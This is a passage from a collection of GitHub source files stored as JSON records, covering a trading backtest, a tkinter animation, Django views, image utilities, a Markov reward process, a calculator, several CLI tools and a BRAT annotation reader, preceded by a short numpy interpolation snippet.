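`find_density()` in the record above does a nearest-neighbour lookup into the temperature-to-density table. A vectorized alternative sketch, assuming linear interpolation between the tabulated temperatures is acceptable for this use case — `mapping` and `temp` are the objects defined in the record:

```python
# Vectorized alternative to the nearest-neighbour lookup above.
import numpy as np

temps = np.array(sorted(mapping))                  # tabulated temperatures, ascending
densities = np.array([mapping[t] for t in temps])  # matching density values
density = np.interp(temp, temps, densities)        # result has the same shape as temp
```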
{"seq_id":"70822332203","text":"import os\nfrom datetime import datetime\n\nfrom backtest.domains.selector_reference import SelectorReference\nfrom backtest.request.selector_reference_from_repo import (\n SelectorReferenceFromRepoInvalidRequest,\n SelectorReferenceFromReponValidRequest,\n)\nfrom backtest.response import ResponseFailure, ResponseSuccess, ResponseTypes, build_response_from_invalid_request\n\nSELECTOR_REFERENCE_CSV_REPO_PATH = \"backtest/csvrepo/selector_reference/{repo_name}_{symbol}_{from_date}_{to_date}.csv\"\nSELECTOR_REFERENCE_CSV_REPO_DIR_PATH = \"backtest/csvrepo/selector_reference\"\n\n\ndef selector_reference_from_repo(repo, request, cache=False):\n str_today = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\n repo_name = type(repo).__name__\n symbol = \"NOSYM\"\n from_date = \"1999-01-01\"\n to_date = str_today\n\n if not request and not isinstance(request, SelectorReferenceFromReponValidRequest):\n invalid_request = SelectorReferenceFromRepoInvalidRequest()\n invalid_request.add_error(\"param_error\", \"this request is not supported..\")\n return build_response_from_invalid_request(invalid_request)\n elif request.filters:\n symbol = request.filters[\"symbol__eq\"] if \"symbol__eq\" in request.filters else \"NOSYM\"\n from_date = request.filters[\"from__eq\"] if \"from__eq\" in request.filters else \"1990-01-01\"\n to_date = request.filters[\"to__eq\"] if \"to__eq\" in request.filters else str_today\n CSV_PATH = SELECTOR_REFERENCE_CSV_REPO_PATH.format(\n repo_name=repo_name, symbol=symbol, from_date=from_date, to_date=to_date\n )\n if cache:\n try:\n selector_reference = SelectorReference.from_csv(CSV_PATH, symbol=symbol)\n return ResponseSuccess(selector_reference)\n except FileNotFoundError:\n pass\n try:\n selector_reference = repo.get(filters=request.filters)\n if cache:\n os.makedirs(SELECTOR_REFERENCE_CSV_REPO_DIR_PATH, exist_ok=True)\n selector_reference.to_csv(CSV_PATH)\n return ResponseSuccess(selector_reference)\n except Exception as e:\n return ResponseFailure(ResponseTypes.SYSTEM_ERROR, e)\n","repo_name":"fromitive/backtest","sub_path":"backtest/use_cases/selector_reference_from_repo.py","file_name":"selector_reference_from_repo.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"28496684747","text":"\r\n# Originally written for Python 2.x; this version already uses Python 3's\r\n# print(..) and the lowercase tkinter module\r\nfrom tkinter import *\r\nimport time\r\nimport math\r\n\r\n\r\n\r\nclass animasi(object):\r\n \r\n\r\n def __init__(self):\r\n apax=50\r\n apay=363\r\n\r\n\r\n self.root = Tk()\r\n\r\n self.canvas = Canvas(self.root, width=500, height = 600)\r\n self.canvas.pack()\r\n \r\n #self.bola = self.canvas.create_oval(2, 960, 42, 1000, outline='white', fill='blue')\r\n \r\n self.bola = self.canvas.create_oval(apax+0, apay+0, apax+40, apay+40, outline='white', fill='red')\r\n self.canvas.pack()\r\n \r\n self.root.after(0, self.animation)\r\n self.root.mainloop()\r\n \r\n\r\n def animation(self):\r\n \r\n # initial position coordinates\r\n x = 20\r\n y = 0\r\n\r\n # movement speed\r\n xhasil = 0.1\r\n \r\n # run the animation\r\n jalan = True\r\n while jalan:\r\n \r\n ylama = y\r\n \r\n # trigonometric function\r\n y = 200 * math.sin(x)\r\n\r\n yhasil = y - ylama\r\n x = x + xhasil\r\n \r\n # loop delay\r\n time.sleep(0.025)\r\n \r\n self.canvas.move(self.bola, xhasil, yhasil)\r\n self.canvas.update()\r\n \r\n\r\n\r\nanimasi()\r\n","repo_name":"natalisransi/animasi","sub_path":"tugas_animasi.py","file_name":"tugas_animasi.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"8347239829","text":"import torch\nimport numpy as np \nimport math\nimport os\nfrom glob import glob\nimport torchvision.transforms as transforms\nfrom PIL import Image\n \ndef saveImage(tensor, filename, original = None, keepColors = False, nrow=8, padding=2, pad_value=0):\n \"\"\"Save a given Tensor into an image file.\n Args:\n tensor (Tensor or list): Image to be saved. If given a mini-batch tensor,\n saves the tensor as a grid of images by calling ``make_grid``.\n **kwargs: Other arguments are documented in ``make_grid``.\n \"\"\"\n if not original: keepColors = False\n tensor = tensor.cpu()\n size = (tensor.size(1), tensor.size(2))\n toIm = transforms.ToPILImage()\n im = toIm(tensor)\n if keepColors:\n im = list(im.convert('YCbCr').split())\n orIm = list(Image.open(original).resize(size, resample=Image.LANCZOS).convert('YCbCr').split())\n orIm[0] = im[0]\n im = Image.merge('YCbCr', orIm).convert('RGB')\n \n im.save(filename)\n\ndef createDir(dir):\n \"\"\"\n Create directory\n \"\"\"\n try: \n os.makedirs(dir)\n print(f'Created new folder at {dir}')\n except FileExistsError: \n print(f'Using previously created folder {dir}')\n return dir\n\ndef saveGif(dir):\n \"\"\"\n Takes a group of images and saves them in a gif\n \"\"\"\n paths = glob(os.path.join(dir, '*.jpg'))\n paths = paths + glob(os.path.join(dir, '*.jpeg'))\n paths = paths + glob(os.path.join(dir, '*.png'))\n\n ims = []\n name = '.gif'\n for im in paths:\n ims.append(Image.open(im))\n name = paths[0].split('/')[0]+'/'+paths[0].split('/')[-1].split('.')[0]+ name\n ims[0].save(name, save_all=True, append_images=ims[1:], duration=500,loop=1)","repo_name":"alenmora/neural-transfer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
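A minimal usage sketch for `saveImage()` above; the file names are placeholders. `keepColors=True` keeps the stylized luminance (Y channel) but restores the original photo's chroma (Cb/Cr), a common color-preservation trick in neural style transfer:

```python
# Sketch: save a stylized tensor while keeping the source image's colors.
import torch
from utils import saveImage  # assuming the record above is saved as utils.py

output = torch.rand(3, 256, 256)  # stand-in for a network output in [0, 1]
saveImage(output, "out.jpg", original="content.jpg", keepColors=True)
```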
{"seq_id":"71101040364","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic.edit import CreateView\nfrom .models import Departamento, DeptoUser\nfrom apps.Estado.funciones import *\n\n\n\n# Create your views here.\n\n# View that shows the right page for a logged-in user!\n@login_required\ndef home(request):\n\tuser = request.user\n\tctx = {'titulo':'Gestión'}\n\tif user.es_root(): # a ROOT user should not see this view\n\t\treturn redirect('/sgpc/cuentas/') # so we redirect them\n\telif user.is_admin():\n\t\tctx['is_admin'] = True\n\n\t# Build the request-management page depending on the department\n\td_u = DeptoUser.objects.filter(usuario=request.user)[0] # get the user and the department they belong to\n\tctx['user_depto'] = d_u\n\tctx['usuario'] = d_u.usuario\n\tctx['depto'] = d_u.depto\n\tif exist_depto_in_state(request.user): # if the department exists in the 'EstadoDepto' model\n\t\tctx['gestionar'] = True\n\t\tctx['pedidos_gestion'] = get_pedidos_in_my_depto(request.user)\n\treturn render(request, 'Deptos/depto.html', ctx)\n\n\n# View to create a new Departamento\nclass NuevoDepto(CreateView):\n\tmodel = Departamento\n\tfields = '__all__'\n\ttemplate_name = 'Deptos/nuevo_depto.html'\n","repo_name":"cammend/SGPC","sub_path":"apps/Deptos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"11371106579","text":"from PyObjCTools.TestSupport import *\n\nfrom SystemConfiguration import *\nfrom Foundation import NSData, NSDate\nimport os\n\nclass TestSCDynamicStoreCopyDHCPInfo (TestCase):\n def testFunctions(self):\n def callback(st, keys, info):\n pass\n\n st = SCDynamicStoreCreate(None, \"pyobjc.test\", callback, None)\n self.assertTrue(isinstance(st, SCDynamicStoreRef))\n\n have_ip = False\n with os.popen(\"ifconfig en0 | grep inet\", \"r\") as fp:\n ip = fp.read()\n if ip.strip():\n have_ip = True\n else:\n with os.popen(\"ifconfig en1 | grep inet\", \"r\") as fp:\n ip = fp.read()\n if ip.strip():\n have_ip = True\n\n info = SCDynamicStoreCopyDHCPInfo(st, None)\n if not have_ip:\n self.assertIs(info, None)\n else:\n self.assertIsInstance(info, CFDictionaryRef)\n\n r = DHCPInfoGetOptionData(info, 1)\n self.assertTrue(r is None or isinstance(r, NSData))\n\n r = DHCPInfoGetLeaseStartTime(info)\n self.assertTrue(r is None or isinstance(r, NSDate))\n\n if os_release() >= (10, 8):\n DHCPInfoGetLeaseExpirationTime\n\n if info:\n r = DHCPInfoGetLeaseExpirationTime(info)\n self.assertTrue(r is None or isinstance(r, NSDate))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"apple-open-source/macos","sub_path":"pyobjc/pyobjc/pyobjc-framework-SystemConfiguration-2.5.1/PyObjCTest/test_SCDynamicStoreCopyDHCPInfo.py","file_name":"test_SCDynamicStoreCopyDHCPInfo.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"19"}
{"seq_id":"24913311620","text":"\"\"\"\nFunctionality for easily running several filters on one or\nseveral images simultaneously.\n\"\"\"\n\nimport json\nimport inspect\nfrom operator import attrgetter\nfrom collections import Iterable\n\n\ndef process(images, filters, ROIs=None, return_predictions=False,\n combine_results=True, sort_filters=True):\n \"\"\"Processes an image or a list of images using the specified\n set of filters. 
Each filter is applied to each image and the\n results are returned as dict of dicts, where the name of the\n image acts as a key to a bool or a dict of filter results.\n\n :param images: a path to a single image as a string,\n or a list of image paths\n :type images: str, tuple or list\n :param filters: a list of filter objects to apply to each image\n :type filters: list\n :param ROIs: a single ROI as a 4-tuple (x0, y0, w, h) or a list\n of ROIs (should be of same length as images), None\n if not needed\n :type ROIs: list\n :param return_predictions: return predictions as floats\n in range [0, 1] instead of bools\n :type return_predictions: bool\n :param combine_results: combine the results of the filters\n into a single bool, which is false\n if one or more filters returned a\n positive result, and true otherwise\n :type combine_results: bool\n :param sort_filters: run filters in order of their speed\n :type sort_filters: bool\n :returns: dict -- if combine_results is set to True, each\n value is boolean, otherwise all filter\n results are contained in a dict, where\n the results are bools or floats depending\n on the return_predictions parameter\n \"\"\"\n if sort_filters:\n filters.sort(key=attrgetter('speed'))\n\n # process single image\n if isinstance(images, str) or isinstance(images, unicode):\n return {images: __process_image(images, filters, ROIs,\n return_predictions, combine_results)}\n\n # process list or other iterable of images\n elif isinstance(images, Iterable):\n return __process_images(images, filters, ROIs,\n return_predictions, combine_results)\n\n raise TypeError(\"images needs to be a str, 2-tuple or an iterable\")\n\n\ndef process_request(request_json):\n \"\"\"Process a list of images from a JSON request.\n Example JSON request:\n\n { \"images\": {\n \"ko.jpg\": [ 0, 1, 2, 3 ],\n \"ok.jpg\": null\n },\n \"filters\": {\n \"whole_blur\": { \"threshold\": 0.5}\n },\n \"return_predictions\": false,\n \"combine_results\": true,\n \"sort_filters\": true\n }\n\n :param request_json: the JSON request\n :type request_json: str\n :returns: see the documentation for the process function\n \"\"\"\n import qualipy.filters\n filter_classes = inspect.getmembers(qualipy.filters, inspect.isclass)\n\n try:\n request = json.loads(request_json)\n except:\n raise ValueError(\"Invalid JSON format\")\n\n if 'images' not in request or 'filters' not in request:\n raise ValueError(\"images or filters array not in JSON\")\n\n images, ROIs = __parse_images_and_ROIs(request['images'])\n filters = __collect_filters(request['filters'], filter_classes)\n\n return_predictions = __get_argument(request, 'return_predictions', False)\n combine_results = __get_argument(request, 'combine_results', True)\n sort_filters = __get_argument(request, 'sort_filters', True)\n\n return process(images, filters, ROIs, return_predictions, combine_results,\n sort_filters)\n\n\ndef __process_images(images, filters, ROIs, return_predictions,\n combine_results):\n \"\"\"Process a list of images\"\"\"\n if ROIs is None:\n return {image: __process_image(image, filters, None,\n return_predictions, combine_results)\n for image in images}\n\n if len(images) != len(ROIs):\n raise ValueError(\"image and ROI lists need to be of same length\")\n\n return {image: __process_image(image, filters, roi,\n return_predictions, combine_results)\n for image, roi in zip(images, ROIs)}\n\n\ndef __process_image(image, filters, ROI, return_predictions, combine_results):\n \"\"\"Process a single image by running the given list of 
filters on it.\"\"\"\n args, results = __get_predict_args(image, ROI, return_predictions), {}\n\n for filt in filters:\n prediction = filt.predict(*args)\n\n # if the result should be returned as a single boolean,\n # return False straightaway after getting a positive result\n if not return_predictions and combine_results and prediction:\n return False\n\n results[filt.name] = prediction\n\n if not return_predictions and combine_results:\n return True\n return results\n\n\ndef __get_predict_args(image, ROI, return_predictions):\n \"\"\"Helper function for formatting arguments given to the predict\n function.\"\"\"\n if ROI is not None:\n if type(ROI) != tuple:\n raise TypeError(\"invalid type ROI for image: %s\" % image)\n\n if len(ROI) != 4:\n raise TypeError(\"invalid length ROI for image: %s\" % image)\n\n return image, not return_predictions, ROI\n\n\ndef __get_filter(name, filter_classes):\n for _, filter in filter_classes:\n if filter.name == name:\n return filter\n return None\n\n\ndef __get_argument(request, arg_name, default):\n if arg_name in request:\n return request[arg_name]\n return default\n\n\ndef __parse_images_and_ROIs(request_images):\n images, ROIs = [], []\n for image, ROI in request_images.iteritems():\n if ROI is None or (isinstance(ROI, list) and len(ROI) == 4):\n images.append(image)\n ROIs.append(None if ROI is None else tuple(ROI))\n else:\n raise ValueError(\"invalid ROI for image %s\" % image)\n return images, ROIs\n\n\ndef __collect_filters(request_filters, filter_classes):\n filters = []\n for filter_name, params in request_filters.iteritems():\n filter_obj = __get_filter(filter_name, filter_classes)\n if filter_obj is None:\n raise ValueError\n\n try:\n # instantiate a filter object with the given parameters\n filters.append(filter_obj(**params))\n except TypeError:\n raise ValueError(\"Invalid parameters for filter %s\" % filter_name)\n\n return filters\n","repo_name":"vismantic-ohtuprojekti/qualipy","sub_path":"qualipy/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6576,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"19"}
{"seq_id":"39786706285","text":"#Pohsun Chang\n#830911\n#MSITM6341\n#10/29/2019\n\n# Python Program to Calculate Sum of Even Numbers from 1 to N\n \nn=int(input('Enter the number:'))\nsum=0\nif(n>0):\n for x in range(0,n+1):\n if(x % 2 == 0):\n sum=sum+x\n \nprint(sum)\n","repo_name":"ppaul456/Python","sub_path":"Attendance/sum_even_numbers.py","file_name":"sum_even_numbers.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"74412490604","text":"# coding=utf-8\n\n\"\"\"\nLock (mutex)\nA Lock is used when several processes need to access a shared resource, to avoid conflicting accesses. Holding the lock guarantees that when multiple processes modify the same data, only one modification happens at a time -- the changes are serialized, trading speed for data safety. A Lock has two states -- locked and unlocked -- and two basic methods.\n\nConstructor: Lock()\n\nInstance methods:\n\nacquire([timeout]): puts the caller into a blocking state while it tries to obtain the lock.\nrelease(): releases the lock. The caller must already hold the lock, otherwise an exception is raised.\n\n======================\n\nRLock (re-entrant mutex: the same process can acquire it several times without blocking itself)\nAn RLock (re-entrant lock) is a synchronization primitive that can be requested multiple times by the same thread. RLock uses the notions of an \"owning thread\" and a \"recursion level\": while locked, the RLock is owned by some thread, and the owner may call acquire() again, but must then call release() the same number of times. Think of an RLock as a lock plus a counter starting at 0; each successful acquire()/release() moves the counter +1/-1, and the lock is unlocked when the counter is 0.\n\nConstructor: RLock()\n\nInstance methods:\n\nacquire([timeout]): same as Lock\nrelease(): same as Lock\n\"\"\"\n\n\nfrom multiprocessing import Process, Lock\n\n\ndef l(lock, num):\n lock.acquire()\n print(\"Hello Num: %s\" % (num))\n lock.release()\n\n\nif __name__ == '__main__':\n lock = Lock() # this must be defined as a global, before the processes start\n for num in range(20):\n Process(target=l, args=(lock, num)).start()\n","repo_name":"xiang12835/python-learning","sub_path":"process_and_thread/lock_demo.py","file_name":"lock_demo.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
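The docstring above describes RLock but the file only demonstrates Lock. A minimal RLock sketch to complement it: unlike a plain Lock, the same process may re-acquire an RLock it already holds, provided every acquire() is matched by a release():

```python
# Sketch: re-entrant locking with multiprocessing.RLock.
from multiprocessing import Process, RLock

def nested(lock):
    with lock:          # first acquisition
        with lock:      # re-entrant: a plain Lock would deadlock here
            print("acquired twice in the same process")

if __name__ == '__main__':
    rlock = RLock()
    p = Process(target=nested, args=(rlock,))
    p.start()
    p.join()
```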
{"seq_id":"38374693098","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport argparse\nimport logging\nfrom functools import partial\nfrom importlib import import_module\n\nimport sjah.SjahCommand as SjahCommand\n\n\nclass SjahTopLevelCommand(SjahCommand.SjahCommand):\n def __init__(self):\n SjahCommand.SjahCommand.__init__(self)\n self.description = \"Slurm Job Array Helper v {}\".format(self.version)\n # these need to match a class provided in this directory\n # e.g. batch -> BatchCommand.BatchCommand\n self.sub_commands = [\"batch\", \"status\", \"run\"]\n\n def run_subcommand(self):\n subcommand_class_name = \"{}Command\".format(self.args.command.capitalize())\n subcommand_module = import_module(\"sjah.{}\".format(subcommand_class_name))\n subcommand_class = getattr(subcommand_module, subcommand_class_name)\n self.subcommand = subcommand_class()\n self.logger.debug(\"running parser for %s\", self.args.command)\n self.subcommand.run_parser(self.rest_of_args)\n\n def add_args(self):\n # top-level args\n log_levels = self._get_log_levels()\n self.parser.add_argument(\n \"--log-level\",\n help=argparse.SUPPRESS,\n choices=log_levels,\n type=partial(self.choice_alias, log_levels),\n )\n self.parser.add_argument(\n \"command\",\n help=\"Sub-command to run.\",\n choices=self.sub_commands,\n type=partial(self.choice_alias, self.sub_commands),\n )\n self.parser.set_defaults(func=self.run_subcommand)\n\n def run_parser(self):\n # create the top-level parser\n self.parser = argparse.ArgumentParser(\n description=self.description,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=False,\n prog=self.prog,\n )\n self.add_args()\n self.args, self.rest_of_args = self.parser.parse_known_args()\n if self.args.log_level is not None:\n self.logger.setLevel(getattr(logging, self.args.log_level))\n self.logger.debug(\"Setting logging to %s\", self.args.log_level)\n self.logger.debug(\"Got args %s, %s\", self.args, self.rest_of_args)\n self.args.func()\n\n\ndef main():\n sjah_comm = SjahTopLevelCommand()\n sjah_comm.run_parser()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ycrc/sjah","sub_path":"sjah/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"24421041537","text":"from typing import Mapping, Set, Sequence, Tuple, TypeVar, List\nfrom MPv2 import MP\nimport numpy as np\n\n#declare the generic State and Action types\nS = TypeVar('S')\nA = TypeVar('A')\n\nSTSff = Mapping[S, Tuple[Mapping[S, float], float]]\nSSTff = Mapping[S, Mapping[S, Tuple[float, float]]]\nSf = Mapping[S, float]\n#declare the transition matrix type\nSSf = Mapping[S, Mapping[S, float]]\n\n\n\ndef SSTff_to_SSf_Sf(\n info: SSTff\n) -> Tuple[ SSf, SSf ] :\n P = {s : {sp : prob for sp, (prob,_) in innerdict.items() } for s, innerdict in info.items() }\n Rssp = {s : {sp : r for sp, (_,r) in innerdict.items() } for s, innerdict in info.items() }\n return (P, Rssp )\n\n\ndef STSff_to_SSf(\n info: STSff\n) -> SSf :\n return {k : P for k, (P, _) in info.items()}\n\ndef STSff_to_Sf(\n info: STSff\n) -> Sf :\n return {k : r for k, (P, r) in 
info.items()}\n\nclass MRP(MP):\n\n #member variables\n Rss_map : SSf #rewards SSf\n Rs : List[float] #reward vector\n Rss_matrix : np.ndarray #reward matrix\n #inherited\n # state_list: List[S] = None #list of states\n # P_map: SSf = None #transition mapping\n # P_matrix: np.ndarray = None #transition matrix\n \n\n def __init__(\n self,\n state_P_R : SSTff,\n gamma : float\n ) -> None:\n #initialize the underlying MP\n P_R = SSTff_to_SSf_Sf(state_P_R)\n super().__init__( P_R[0] )\n #initialize the reward vector\n self.Rss_map = P_R[1]\n self.Rss_matrix = self.convert_to_matrix(self.Rss_map)\n self.gamma = gamma\n self.Rs = self.get_Rs()\n \n def get_Rs(\n self\n ) -> List[float]:\n #matrix multiply\n M = np.multiply(self.P_matrix, self.Rss_matrix)\n #sum across s'\n Rs = np.sum(M, axis=1)\n return list(Rs)\n\n\nif __name__ == '__main__':\n #SSTff\n data = {\n 1: {1: (0.3, 9.2), 2: (0.6, 3.4), 3: (0.1, -0.3)},\n 2: {1: (0.4, 0.0), 2: (0.2, 8.9), 3: (0.4, 3.5)},\n 3: {3: (1.0, 0.0)}\n }\n # #STSff\n # data = {\n # 1: ({1: 0.6, 2: 0.3, 3: 0.1}, 7.0),\n # 2: ({1: 0.1, 2: 0.2, 3: 0.7}, 10.0),\n # 3: ({3: 1.0}, 0.0)\n # }\n mrp_obj = MRP(data, 1.0)\n print(\"trans matrix\")\n print(mrp_obj.P_matrix)\n print(\"trans map\")\n print(mrp_obj.P_map)\n print(\"state list\")\n print(mrp_obj.state_list)\n print(\"Rss matrix\")\n print(mrp_obj.Rss_matrix)\n print(\"Rs\")\n print(mrp_obj.Rs)\n\n\n","repo_name":"lwarne/CME241","sub_path":"MRP.py","file_name":"MRP.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
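For reference, `get_Rs()` in the MRP record above computes the expected immediate reward per state: the elementwise product of the transition matrix and the reward matrix, summed over successor states. In the notation implied by the code:

```latex
R(s) \;=\; \sum_{s'} P(s, s')\, R(s, s')
```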
{"seq_id":"13340439272","text":"def main():\n formula = input('What do you want to do? \\n')\n components = formula.split()\n if len(components) == 3:\n operator = components[1]\n first_number = convert_input(components[0])\n second_number = convert_input(components[2]) \n\n if operator == '+':\n result = addition(first_number, second_number)\n elif operator == '-':\n result = subtraction(first_number, second_number)\n elif operator == '*':\n result = multiplication(first_number, second_number)\n elif operator == '/':\n result = division(first_number, second_number)\n elif operator == '%':\n result = modulo(first_number, second_number)\n else:\n print(f'No formula found: {formula}')\n return\n\n print(f'The answer is: {result}')\n else:\n print(f'No formula found: {formula}')\n\n\ndef convert_input(user_num):\n try:\n number = float(user_num)\n return number\n except ValueError:\n print(f\"Couldn\\'t convert {user_num} to a float\")\n\n\ndef addition(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a + b\n\n\ndef subtraction(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a - b\n\n\ndef multiplication(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a * b\n\n\ndef division(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a / b\n\n\ndef modulo(a, b):\n a = convert_input(a)\n b = convert_input(b)\n return a % b\n\n\nif __name__ == '__main__':\n main()","repo_name":"jbettenh/calculator","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"18288793879","text":"########## Linear regression: sweep W from -3 to 5 in 15 steps and compare the cost ###########\n# import numpy as np\n#\n# X= np.array([1,2,3])\n# Y= np.array([1,2,3])\n#\n# def cost_func(W,X,Y):\n# c=0\n# for i in range(len(X)):\n# c += (W*X[i] - Y[i])**2\n# return c / len(X)\n# for feed_W in np.linspace( -3, 5, num = 15):\n# curr_cost = cost_func(feed_W,X,Y)\n#\n# print(\"{:6.3f}|{:10.5f}\".format(feed_W, curr_cost))\n########### the same, written with TensorFlow ###############\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport numpy as np\nimport tensorflow as tf\n\nX= np.array([1,2,3])\nY= np.array([1,2,3,])\n\ndef cost_func(W,X,Y):\n hypothesis = X * W\n return tf.reduce_mean(tf.square(hypothesis - Y))\n\nW_values = np.linspace( -3, 5, num=15)\ncost_values = []\n\nfor feed_W in W_values:\n curr_cost = cost_func(feed_W, X, Y)\n cost_values.append(curr_cost)\n print(\"{:6.3f}|{:10.5f}\".format(feed_W, curr_cost))\n","repo_name":"junhyeonglee1/tensorflow_basic","sub_path":"BasicMLLab3-1.py","file_name":"BasicMLLab3-1.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"36242682323","text":"import sys\nfrom Detectors.Preprocessor import Preprocessor\n\nif __name__==\"__main__\":\n from optparse import OptionParser, OptionGroup\n optparser = OptionParser(description=\"A tool chain for making interaction XML, sentence splitting, NER and parsing\")\n optparser.add_option(\"-i\", \"--input\", default=None, dest=\"input\", help=\"The input argument for the first step\")\n optparser.add_option(\"-o\", \"--output\", default=None, dest=\"output\", help=\"The output argument for the last step\")\n #optparser.add_option(\"-p\", \"--parameters\", default=None, dest=\"parameters\", help=\"Step parameters, a comma-separated list of 'STEP.parameter=value' definitions\")\n optparser.add_option(\"-s\", \"--steps\", default=None, dest=\"steps\", help=\"A comma separated list of steps or presets\")\n shortcuts = OptionGroup(optparser, \"Preprocessing step parameter shortcuts\", \"\")\n shortcuts.add_option(\"-n\", \"--dataSetNames\", default=None, dest=\"dataSetNames\", help=\"CONVERT step dataset names\")\n shortcuts.add_option(\"-c\", \"--corpus\", default=None, dest=\"corpus\", help=\"CONVERT step XML corpus element name\")\n shortcuts.add_option(\"--requireEntities\", default=False, action=\"store_true\", dest=\"requireEntities\", help=\"Default setting for parsing steps\")\n #optparser.add_option(\"--constParser\", default=\"BLLIP-BIO\", help=\"BLLIP, BLLIP-BIO or STANFORD\")\n #optparser.add_option(\"--depParser\", default=\"STANFORD-CONVERT\", help=\"STANFORD or STANFORD-CONVERT\")\n shortcuts.add_option(\"--parseName\", default=\"McCC\", help=\"Default setting for parsing steps\")\n shortcuts.add_option(\"--parseDir\", default=None, help=\"IMPORT-PARSE step parse files directory\")\n shortcuts.add_option(\"--importFormats\", default=None, help=\"LOAD/IMPORT-PARSE format options\")\n shortcuts.add_option(\"--exportFormats\", default=None, help=\"EXPORT format options\")\n optparser.add_option_group(shortcuts)\n debug = OptionGroup(optparser, \"Debug and Process Control Options\", \"\")\n# debug.add_option(\"-f\", \"--fromStep\", default=None, dest=\"fromStep\", help=\"Continue from this step\")\n# debug.add_option(\"-t\", \"--toStep\", default=None, dest=\"toStep\", help=\"Stop at after this step\")\n# debug.add_option(\"--omitSteps\", default=None, dest=\"omitSteps\", help=\"Skip these steps\")\n debug.add_option(\"--logPath\", default=\"AUTO\", dest=\"logPath\", help=\"AUTO, None, or a path\")\n #debug.add_option(\"--intermediateFiles\", default=False, action=\"store_true\", dest=\"intermediateFiles\", help=\"Save an intermediate file for each step\")\n debug.add_option(\"--debug\", default=False, 
action=\"store_true\", dest=\"debug\", help=\"Set debug mode for all steps\")\n optparser.add_option_group(debug)\n (options, args) = optparser.parse_args()\n \n# if options.steps != None:\n# options.steps = [x.strip() for x in options.steps.split(\",\")]\n# if options.omitSteps != None:\n# options.omitSteps = options.omitSteps.split(\",\")\n# \n preprocessor = Preprocessor(options.steps, options.parseName, options.requireEntities)\n if options.steps == None:\n print >> sys.stderr, preprocessor.getHelpString()\n else:\n preprocessor.setArgForAllSteps(\"debug\", options.debug)\n if preprocessor.hasStep(\"CONVERT\"):\n if options.corpus != None:\n preprocessor.getStep(\"CONVERT\").setArg(\"corpusName\", options.corpus)\n if options.dataSetNames != None:\n preprocessor.getStep(\"CONVERT\").setArg(\"dataSetNames\", options.dataSetNames)\n if options.parseDir:\n preprocessor.getStep(\"IMPORT_PARSE\").setArg(\"parseDir\", options.parseDir)\n if options.exportFormats and preprocessor.hasStep(\"EXPORT\"):\n preprocessor.getStep(\"EXPORT\").setArg(\"formats\", options.exportFormats.split(\",\"))\n if options.importFormats:\n if preprocessor.hasStep(\"LOAD\"):\n preprocessor.getStep(\"LOAD\").setArg(\"extensions\", options.importFormats.split(\",\"))\n if preprocessor.hasStep(\"IMPORT_PARSE\"):\n preprocessor.getStep(\"IMPORT_PARSE\").setArg(\"extensions\", options.importFormats.split(\",\"))\n #if options.intermediateFiles:\n # preprocessor.setIntermediateFiles(True)\n preprocessor.process(options.input, options.output, model=None, logPath=options.logPath)","repo_name":"jbjorne/TEES","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"19"} +{"seq_id":"72472201324","text":"import sys\nimport re\nimport os\nfrom pathlib import Path\nfrom config import conf_with_sentence_splitting\n\n# If the .txt files have \\r\\n, have this set to `True`\n_with_crlf = True\n_crlf_rx = re.compile('\\r?\\n$')\n_sentence_case_rx = re.compile('^\\\\s*[A-ZȘȚĂÎÂ][a-zșțăîâ-]+\\\\W')\n\ndef read_txt_ann_pair(txt_file: str, ann_file: str, abbreviations: set[str]) -> dict[str, list[tuple[str, int, int]]]:\n \"\"\"Reads in a pair of a text file and its BRAT annotation counterpart\n and returns the list of paragraphs along with start/end offsets of annotations.\"\"\"\n\n txt_lines = []\n\n with open(txt_file, mode='r', encoding='utf-8') as f:\n txt_lines = f.readlines()\n # end with\n\n ann_offsets = []\n\n with open(ann_file, mode='r', encoding='utf-8') as f:\n line_count = 0\n \n for line in f:\n line_count += 1\n line_parts = line.strip().split('\\t')\n example_added = False\n\n if len(line_parts) == 3:\n tid, offsets, entity = line_parts\n\n if tid and offsets and 